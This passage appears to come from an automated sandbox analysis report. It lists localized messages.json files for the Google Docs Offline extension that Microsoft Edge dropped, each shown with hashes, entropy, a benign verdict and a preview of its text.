                                                                                                                                                                                    SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1285
                                                                                                                                                                                    Entropy (8bit):4.702209356847184
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                    MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                    SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                    SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                    SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1244
                                                                                                                                                                                    Entropy (8bit):4.5533961615623735
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                    MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                    SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                    SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                    SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                    Entropy (8bit):4.867640976960053
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                    MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                    SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                    SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                    SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3107
                                                                                                                                                                                    Entropy (8bit):3.535189746470889
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                    MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                    SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                    SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                    SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1389
                                                                                                                                                                                    Entropy (8bit):4.561317517930672
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                    MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                    SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                    SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                    SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1763
                                                                                                                                                                                    Entropy (8bit):4.25392954144533
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                    MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                    SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                    SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                    SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):930
                                                                                                                                                                                    Entropy (8bit):4.569672473374877
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                    MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                    SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                    SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                    SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):913
                                                                                                                                                                                    Entropy (8bit):4.947221919047
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                    MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                    SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                    SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                    SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):806
                                                                                                                                                                                    Entropy (8bit):4.815663786215102
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                    MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                    SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                    SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                    SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                    Entropy (8bit):4.5096240460083905
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                    MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                    SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                    SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                    SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                    Entropy (8bit):4.621865814402898
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                    MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                    SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                    SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                    SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                    Entropy (8bit):4.618182455684241
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                    MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                    SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                    SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                    SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):848
                                                                                                                                                                                    Entropy (8bit):4.494568170878587
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                    MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                    SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                    SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                    SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                    Entropy (8bit):4.461560329690825
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                    MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                    SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                    SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                    SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
